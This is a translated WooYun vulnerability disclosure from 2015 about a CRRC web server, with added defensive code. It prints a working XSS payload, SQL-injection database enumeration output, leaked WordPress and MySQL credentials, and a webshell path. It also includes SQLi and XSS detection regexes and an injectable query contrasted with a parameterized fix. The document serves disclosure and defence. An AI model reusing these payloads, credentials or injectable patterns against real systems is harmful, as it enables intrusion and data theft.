Vulnerability summary

Defect ID: wooyun-2015-0143510

Title: Injection vulnerability on a CRRC (中国中车) site leaks the entire database and site source code; GETSHELL (bundled findings)

Related vendor: chinacnr.com

Author: 路人甲

Submitted: 2015-09-26 00:59

Fixed: 2015-11-14 09:30

Published: 2015-11-14 09:30

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-09-26: Details sent to the vendor; awaiting the vendor's response
2015-09-30: CNCERT (National Internet Emergency Center) could not yet reach the responsible organization; details disclosed only to the reporting body
2015-10-10: Details disclosed to core white hats and domain experts
2015-10-20: Details disclosed to regular white hats
2015-10-30: Details disclosed to intern white hats
2015-11-14: Details disclosed to the public

Brief description:

CRRC Corporation Limited (中国中车), formed by the merger of CSR Corporation Limited (中国南车) and CNR Corporation Limited (中国北车), was registered on 1 June 2015 and listed in Shanghai and Hong Kong on 8 June.
The findings cover the following vulnerability types:
1. SQL injection
2. MySQL (port 3306) reachable from outside
3. WordPress admin login
4. XSS
5. Anonymous FTP
6. Git information leak, allowing the source code to be retrieved in full
7. Openfire setup wizard exposed
8. getshell

Detailed description:

0x00 Affected site
http://**.**.**.**/c/ca/travel
0x01 SQL injection; the database account has root privileges
http://**.**.**.**/c/ca/mall/mall-search?page=1&sCat=1

[image: sql1.gif]

[image: sql2.jpg]


available databases [11]:
[*] exhibition
[*] gaotie_server_production
[*] information_schema
[*] multimedia
[*] mysql
[*] openfire
[*] smartstream
[*] smartvideo2.0
[*] test
[*] wifiuser
[*] wordpress


back-end DBMS: MySQL 5.0
Database: multimedia
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dish | 253 |
| `call` | 51 |
| admin | 1 |
+---------------------------------------+---------+
Database: wifiuser
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| verification | 28 |
| `user` | 1 |
+---------------------------------------+---------+
Database: smartstream
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| t_app_inject | 410 |
+---------------------------------------+---------+
Database: gaotie_server_production
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| investigations | 513 |
| ordernumber_dinnernumbers | 425 |
| dinner_orders | 370 |
| services | 72 |
| users | 50 |
| phone_verifications | 34 |
| media_infos | 30 |
| schema_migrations | 25 |
| dinner_lists | 16 |
| version_infos | 13 |
| games | 7 |
| video_urls | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| help_category | 40 |
| `user` | 9 |
| db | 5 |
| aavpxl | 2 |
| aokeqh | 2 |
| dsdbxv | 2 |
| fqgqxn | 2 |
| hgrtcv | 2 |
| jfvdcq | 2 |
| jgdpkq | 2 |
| jivobb | 2 |
| ldqjya | 2 |
| lgmekb | 2 |
| llextr | 2 |
| lxbois | 2 |
| nhihiw | 2 |
| ogjcrw | 2 |
| pkjrzz | 2 |
| rzeusc | 2 |
| siijdo | 2 |
| speuqu | 2 |
| sviewt | 2 |
| tcfgbd | 2 |
| uisqxf | 2 |
| uzlehr | 2 |
| wqdfwa | 2 |
| xzcjbi | 2 |
| zdnvhg | 2 |
| zmzxdy | 2 |
| zzbhcj | 2 |
| abcgv | 1 |
| abcgvmo | 1 |
| dvjeuh | 1 |
| hgonvs | 1 |
| hmlrty | 1 |
| jkwxyx32 | 1 |
| john | 1 |
| john1 | 1 |
| john2 | 1 |
| john3 | 1 |
| llbarm | 1 |
| lmwazy | 1 |
| lydsaj | 1 |
| nhrazr | 1 |
| tempEx | 1 |
| tempExT | 1 |
| tempExT1 | 1 |
| tempMix1 | 1 |
| tirnal32 | 1 |
| wacnnl32 | 1 |
| xblvrb | 1 |
| xhctwk | 1 |
| xkyzvl | 1 |
+---------------------------------------+---------+
Database: wordpress
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wp_postmeta | 1459 |
| wp_posts | 883 |
| wp_term_relationships | 324 |
| wp_options | 187 |
| wp_term_taxonomy | 82 |
| wp_terms | 82 |
| wp_stl_timeline_terms | 80 |
| wp_comments | 73 |
| wp_usermeta | 24 |
| wp_stl_timeline_bands | 2 |
| wp_users | 1 |
+---------------------------------------+---------+
Database: exhibition
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wp_postmeta | 2256 |
| wp_posts | 1406 |
| wp_options | 201 |
| wp_term_taxonomy | 81 |
| wp_terms | 81 |
| wp_usermeta | 34 |
| wp_comments | 5 |
| wp_users | 2 |
+---------------------------------------+---------+
Database: smartvideo2.0
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| PLAYRECORDPO | 2867 |
| SINGLEFILECONTENTPO | 379 |
| PICCONTENTPO | 183 |
| ASSETPO | 180 |
| SYSTEMCONFIGPO | 62 |
| RES_ID | 47 |
| MENUMANAGEPO | 27 |
| SCHEDULEPO | 17 |
| INFOPUBPOSITIONPO | 16 |
| ADMINRECOMMENTPO | 15 |
| TEXT_SCHEDULE | 15 |
| PREPARECHANNELPO | 12 |
| COLUMNPO | 11 |
| TERMINALINFOPO | 11 |
| ASSETPACKAGEPO | 8 |
| CHANNELPO | 8 |
| SINGLESTREAMCONTENTPO | 8 |
| INFOPUBTEMPLETPO | 6 |
| ADVERTPOSITIONPO | 3 |
| ADVERTMAPPO | 2 |
| ADVERTPO | 2 |
| USERPO | 2 |
| ADMINUSERPO | 1 |
| ASSET_SCHEDULE | 1 |
| TERMINALGROUPPO | 1 |
| TEXTCONTENTPO | 1 |
+---------------------------------------+---------+
Database: openfire
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ofOffline | 124 |
| ofUser | 24 |
| ofPresence | 22 |
| ofProperty | 13 |
| ofSecurityAuditLog | 11 |
| ofID | 5 |
| ofPubsubDefaultConf | 2 |
| ofMucService | 1 |
| ofPubsubAffiliation | 1 |
| ofPubsubNode | 1 |
| ofVersion | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| STATISTICS | 338 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| TABLES | 227 |
| KEY_COLUMN_USAGE | 215 |
| TABLE_CONSTRAINTS | 156 |
| USER_PRIVILEGES | 139 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| SCHEMA_PRIVILEGES | 68 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 11 |
| ENGINES | 5 |
+---------------------------------------+---------+


0x02 MySQL database connection: every database can be dumped and downloaded directly
Using --password, a MySQL account and password can be obtained: r00t **.**.**.**

[image: 1.gif]

[image: 2.gif]


0x03 WordPress admin login
http://**.**.**.**/wp-login.php
admin hello

[image: aaa.jpg]


0x04 XSS
http://**.**.**.**/c/ca/travel/travel-timetable
from=1'%22()%26%25<woo><ScRiPt%20>prompt(yun)</ScRiPt>&to=1

[image: bbb.png]


0x05 Anonymous FTP login

[image: ccc.png]


0x06 Git information leak; the source code can be retrieved in full

[image: git.gif]

The go-to tool here is GitHack.py:
http://**.**.**.**/.git/

[image: abc.png]


0x07 Openfire setup wizard exposed
**.**.**.**:9090/setup/index.jsp

[image: fire.gif]


0x08 A webshell
http://**.**.**.**/.git/mod_xsystem.php

[image: a.gif]
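The findings above all leave traces in the web server's access log: SQL probes against the mall-search parameters, the script payload in the travel-timetable query string, requests for files under /.git/, a PHP file being served from that directory, POSTs to wp-login.php and hits on Openfire's setup wizard. The following detector is an added example and not part of the report or of any tool it names; it parses constructed Common Log Format lines (documentation-range addresses, paths modelled on the report) and tags each request with the finding it matches, so a defender can alert on the source address before the database is dumped.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format). Client addresses
# are RFC 5737 documentation ranges; the paths and payload shapes follow the
# report above. The /setup/index.jsp hit would in practice come from the
# Openfire admin console's own log on port 9090.
SAMPLE_LOG = """\
198.51.100.2 - - [25/Sep/2015:23:40:00 +0800] "GET /c/ca/travel HTTP/1.1" 200 10240
203.0.113.7 - - [25/Sep/2015:23:41:02 +0800] "GET /c/ca/mall/mall-search?page=1&sCat=1 HTTP/1.1" 200 5120
203.0.113.7 - - [25/Sep/2015:23:41:03 +0800] "GET /c/ca/mall/mall-search?page=1&sCat=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120
203.0.113.7 - - [25/Sep/2015:23:41:09 +0800] "GET /c/ca/travel/travel-timetable?from=1'%22()%26%25<woo><ScRiPt%20>prompt(yun)</ScRiPt>&to=1 HTTP/1.1" 200 880
203.0.113.7 - - [25/Sep/2015:23:42:15 +0800] "GET /.git/HEAD HTTP/1.1" 200 23
203.0.113.7 - - [25/Sep/2015:23:42:16 +0800] "GET /.git/index HTTP/1.1" 200 40211
203.0.113.7 - - [25/Sep/2015:23:43:00 +0800] "GET /.git/mod_xsystem.php HTTP/1.1" 200 77
203.0.113.7 - - [25/Sep/2015:23:44:31 +0800] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [25/Sep/2015:23:45:10 +0800] "GET /setup/index.jsp HTTP/1.1" 200 3100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) (?P<size>\S+)$'
)
# SQL injection indicators: SQL keywords, a quote followed by a boolean
# operator (1' AND ...), or comment markers that truncate the query.
SQLI_RE = re.compile(
    r"(\b(union|select|sleep|benchmark|information_schema|concat)\b"
    r"|['\"]\s*(or|and)\b|--\s|/\*)", re.I)
# Reflected XSS indicators: script tags, event handlers, javascript: URLs,
# and the dialog functions commonly used as proof payloads.
XSS_RE = re.compile(
    r"(<\s*/?\s*script|\bon\w+\s*=|javascript:|\b(alert|prompt|confirm)\s*\()", re.I)


def parse_line(line):
    """Parse one CLF line into a dict with the path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes each value once; double-encoding evasion
    # is out of scope for this example.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of finding tags that apply to one parsed request."""
    tags = []
    path, status = rec["path"], rec["status"]
    if path.startswith("/.git/"):
        # A 200 means the repository metadata is actually being served.
        tags.append("git-exposure" if status == "200" else "git-probe")
        if status == "200" and path.endswith(".php"):
            tags.append("script-under-dotgit")
    if path.startswith("/setup/"):
        tags.append("openfire-setup-wizard")
    if rec["method"] == "POST" and path == "/wp-login.php":
        tags.append("wp-login-attempt")
    values = [v for _, v in rec["params"]]
    if any(SQLI_RE.search(v) for v in values):
        tags.append("sqli")
    if any(XSS_RE.search(v) for v in values):
        tags.append("xss")
    return tags


def scan(log_text):
    """Return (client ip, path, tags) for every line that triggers at least one tag."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            findings.append((rec["ip"], rec["path"], tuple(tags)))
    return findings


def by_source(findings):
    """Count flagged requests per client address; this is the value to alert on."""
    return Counter(ip for ip, _, _ in findings)


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, path, ",".join(tags))
    print(by_source(scan(SAMPLE_LOG)))
```

The status check on /.git/ is the important part: a 404 or 403 there is a probe worth noting, while a 200 is confirmation that the repository, and anything dropped into it, is being served.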


Proof of vulnerability:

[image: aaa.jpg]

[image: a.gif]


Remediation:

Remove the webshell.
Filter and validate input.
Harden the configuration.
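"Filter" in the remediation means more than stripping quotes: the mall-search endpoint takes two numeric parameters, page and sCat, so the fix is to reject anything that is not an unsigned integer and to bind the values as query parameters rather than splicing them into SQL text. The following is an added example, not the affected application's code (whose language the report does not show); it uses an in-memory SQLite table with constructed rows to contrast a concatenating search function with a validated, parameterized one.

```python
import sqlite3

# Constructed schema and rows standing in for the mall catalogue; the
# hidden flag marks rows a normal search must never return.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE mall_item (id INTEGER PRIMARY KEY, cat INTEGER, "
        "name TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO mall_item (cat, name, hidden) VALUES (?, ?, ?)",
        [(1, "tea", 0), (1, "noodles", 0), (2, "blanket", 0),
         (9, "internal-note", 1)])
    return conn


def search_vulnerable(conn, page, s_cat):
    """Before: sCat is spliced into the SQL text, so it becomes part of the query."""
    offset = (int(page) - 1) * 10
    sql = (f"SELECT name FROM mall_item WHERE hidden = 0 AND cat = {s_cat} "
           f"LIMIT 10 OFFSET {offset}")
    return [row[0] for row in conn.execute(sql).fetchall()]


def parse_int(value, minimum=0, maximum=10**6):
    """Allow only ASCII digit strings within a sane range; reject everything else."""
    if not isinstance(value, str) or not (value.isascii() and value.isdigit()):
        raise ValueError(f"expected an unsigned integer, got {value!r}")
    n = int(value)
    if not minimum <= n <= maximum:
        raise ValueError(f"value {n} outside [{minimum}, {maximum}]")
    return n


def search_hardened(conn, page, s_cat):
    """After: typed validation plus bound parameters; the input can never be SQL."""
    page_n = parse_int(page, minimum=1)
    cat_n = parse_int(s_cat)
    rows = conn.execute(
        "SELECT name FROM mall_item WHERE hidden = 0 AND cat = ? "
        "LIMIT 10 OFFSET ?",
        (cat_n, (page_n - 1) * 10)).fetchall()
    return [row[0] for row in rows]


def is_rejected(conn, page, s_cat):
    """True if the hardened search refuses the input instead of running it."""
    try:
        search_hardened(conn, page, s_cat)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, sCat='1 OR 1=1':", search_vulnerable(db, "1", "1 OR 1=1"))
    print("hardened,   sCat='1':        ", search_hardened(db, "1", "1"))
    print("hardened rejects tautology:  ", is_rejected(db, "1", "1 OR 1=1"))
```

With sCat set to the tautology 1 OR 1=1 the concatenating version returns every row, hidden ones included, which is the same class of failure that let the whole server be enumerated above; the hardened version never reaches the database with that input. Binding alone would also stop the injection (a bound string is compared as data, not parsed as SQL), but the explicit integer check keeps garbage out of logs and error paths as well.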

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-09-30 09:29

Vendor reply:


CNVD has confirmed the reported situation and has notified the site operator by e-mail through its public contact channel; the operator will provide a fix.

Latest status:

None yet